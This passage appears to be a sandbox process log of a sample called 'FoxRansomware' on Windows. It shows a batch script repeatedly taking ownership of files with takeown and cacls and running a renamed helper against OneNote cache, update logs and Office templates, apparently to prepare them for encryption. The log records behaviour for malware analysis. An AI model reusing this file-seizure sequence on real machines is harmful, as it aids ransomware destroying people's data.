C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5676
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009B.bin""2⤵PID:988
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009B.bin" /E /G Admin:F /C3⤵PID:7084
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009B.bin"3⤵
- Modifies file permissions
PID:7076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000009B.bin" -nobanner3⤵PID:5208
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000009B.bin" -nobanner4⤵PID:7492
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6900
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009L.bin""2⤵PID:7068
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009L.bin" /E /G Admin:F /C3⤵PID:6812
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009L.bin"3⤵PID:1420
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000009L.bin" -nobanner3⤵PID:7468
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000009L.bin" -nobanner4⤵PID:5448
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1520
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A6.bin""2⤵PID:888
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A6.bin" /E /G Admin:F /C3⤵PID:3580
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A6.bin"3⤵PID:6784
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "000000A6.bin" -nobanner3⤵PID:6960
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "000000A6.bin" -nobanner4⤵PID:5792
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7012
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AH.bin""2⤵PID:7336
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AH.bin" /E /G Admin:F /C3⤵PID:5616
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AH.bin"3⤵PID:6284
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "000000AH.bin" -nobanner3⤵PID:6748
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "000000AH.bin" -nobanner4⤵PID:3052
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6352
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B7.bin""2⤵PID:7768
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B7.bin" /E /G Admin:F /C3⤵PID:7672
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B7.bin"3⤵
- Modifies file permissions
PID:7188
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "000000B7.bin" -nobanner3⤵PID:3144
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "000000B7.bin" -nobanner4⤵PID:7516
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7840
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f9b86dce-59a9-4092-9762-e47526cca2eb.1.etl""2⤵PID:5844
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f9b86dce-59a9-4092-9762-e47526cca2eb.1.etl" /E /G Admin:F /C3⤵PID:7052
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f9b86dce-59a9-4092-9762-e47526cca2eb.1.etl"3⤵PID:5644
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "UpdateSessionOrchestration.f9b86dce-59a9-4092-9762-e47526cca2eb.1.etl" -nobanner3⤵PID:7416
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "UpdateSessionOrchestration.f9b86dce-59a9-4092-9762-e47526cca2eb.1.etl" -nobanner4⤵PID:8028
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6880
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.ebfb2dd8-b031-42e7-b953-b7d8dc87c2ed.2.etl""2⤵PID:7608
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.ebfb2dd8-b031-42e7-b953-b7d8dc87c2ed.2.etl" /E /G Admin:F /C3⤵PID:1608
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.ebfb2dd8-b031-42e7-b953-b7d8dc87c2ed.2.etl"3⤵PID:7876
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MoUsoCoreWorker.ebfb2dd8-b031-42e7-b953-b7d8dc87c2ed.2.etl" -nobanner3⤵PID:7580
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MoUsoCoreWorker.ebfb2dd8-b031-42e7-b953-b7d8dc87c2ed.2.etl" -nobanner4⤵PID:2292
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1952
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin""2⤵PID:7756
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin" /E /G Admin:F /C3⤵PID:7448
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin"3⤵PID:7444
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000000G.bin" -nobanner3⤵PID:7812
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000000G.bin" -nobanner4⤵PID:7104
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7412
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin""2⤵PID:2692
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin" /E /G Admin:F /C3⤵PID:7940
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000R.bin"3⤵PID:5600
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000000R.bin" -nobanner3⤵PID:6948
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000000R.bin" -nobanner4⤵PID:3708
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6956
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin""2⤵PID:5444
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin" /E /G Admin:F /C3⤵PID:5392
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000015.bin"3⤵PID:5536
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000015.bin" -nobanner3⤵PID:8104
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000015.bin" -nobanner4⤵PID:3712
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5852
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin""2⤵PID:5372
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin" /E /G Admin:F /C3⤵PID:6028
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin"3⤵PID:6000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000005.bin" -nobanner3⤵PID:4496
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000005.bin" -nobanner4⤵PID:5732
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6132
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin""2⤵PID:1468
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin" /E /G Admin:F /C3⤵PID:5944
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin"3⤵
- Modifies file permissions
PID:2612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000000I.bin" -nobanner3⤵PID:6840
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000000I.bin" -nobanner4⤵PID:5860
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5036
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin""2⤵PID:2132
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin" /E /G Admin:F /C3⤵PID:4340
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin"3⤵PID:5084
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000000T.bin" -nobanner3⤵PID:2028
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000000T.bin" -nobanner4⤵PID:5128
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4704
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin""2⤵PID:4200
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin" /E /G Admin:F /C3⤵PID:7040
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin"3⤵PID:4524
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000017.bin" -nobanner3⤵PID:4020
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000017.bin" -nobanner4⤵PID:3160
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5812
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat""2⤵PID:6580
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat" /E /G Admin:F /C3⤵PID:8080
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\Settings\settings.dat"3⤵PID:5980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "settings.dat" -nobanner3⤵PID:3744
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "settings.dat" -nobanner4⤵PID:6984
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6916
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin""2⤵PID:6444
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin" /E /G Admin:F /C3⤵PID:5940
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006H.bin"3⤵
- Modifies file permissions
PID:1488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000006H.bin" -nobanner3⤵PID:4856
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000006H.bin" -nobanner4⤵PID:5712
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5764
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1""2⤵PID:4312
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1" /E /G Admin:F /C3⤵PID:5876
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\AppV\Setup\OfficeIntegrator.ps1"3⤵PID:7844
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "OfficeIntegrator.ps1" -nobanner3⤵PID:4896
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "OfficeIntegrator.ps1" -nobanner4⤵PID:3000
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5668
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""2⤵PID:1428
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:5132
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"3⤵
- Modifies file permissions
PID:7136
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "resource.xml" -nobanner3⤵PID:6324
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "resource.xml" -nobanner4⤵PID:6400
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4148
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""2⤵PID:7096
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:6160
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"3⤵PID:6256
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "resource.xml" -nobanner3⤵PID:5192
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "resource.xml" -nobanner4⤵PID:6544
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2220
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml""2⤵PID:6252
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml" /E /G Admin:F /C3⤵PID:6648
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml"3⤵PID:6288
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner3⤵PID:6280
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner4⤵PID:6668
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6304
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006J.bin""2⤵PID:6356
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006J.bin" /E /G Admin:F /C3⤵PID:7064
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006J.bin"3⤵PID:5300
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000006J.bin" -nobanner3⤵PID:5216
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000006J.bin" -nobanner4⤵PID:7272
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6188
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml""2⤵PID:7736
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml" /E /G Admin:F /C3⤵PID:6452
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml"3⤵PID:5532
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner3⤵PID:3168
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner4⤵PID:8136
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3900
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml""2⤵PID:2100
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml" /E /G Admin:F /C3⤵PID:8108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml"3⤵PID:5396
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "RoamingCredentialSettings.xml" -nobanner3⤵PID:7008
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "RoamingCredentialSettings.xml" -nobanner4⤵PID:6900
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6244
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin""2⤵PID:4932
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin" /E /G Admin:F /C3⤵PID:5464
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin"3⤵PID:6780
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "00000075.bin" -nobanner3⤵PID:7468
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "00000075.bin" -nobanner4⤵PID:6464
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7212
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007R.bin""2⤵PID:6108
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007R.bin" /E /G Admin:F /C3⤵PID:3200
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007R.bin"3⤵PID:7024
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c fjPLyeD8.exe -accepteula "0000007R.bin" -nobanner3⤵PID:7544
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula "0000007R.bin" -nobanner4⤵PID:940
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\fjPLyeD8.exefjPLyeD8.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4192
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Qs3mgC4t.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000085.bin""2⤵PID:5276
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000085.bin" /E /G Admin:F /C3⤵PID:7128
-
-
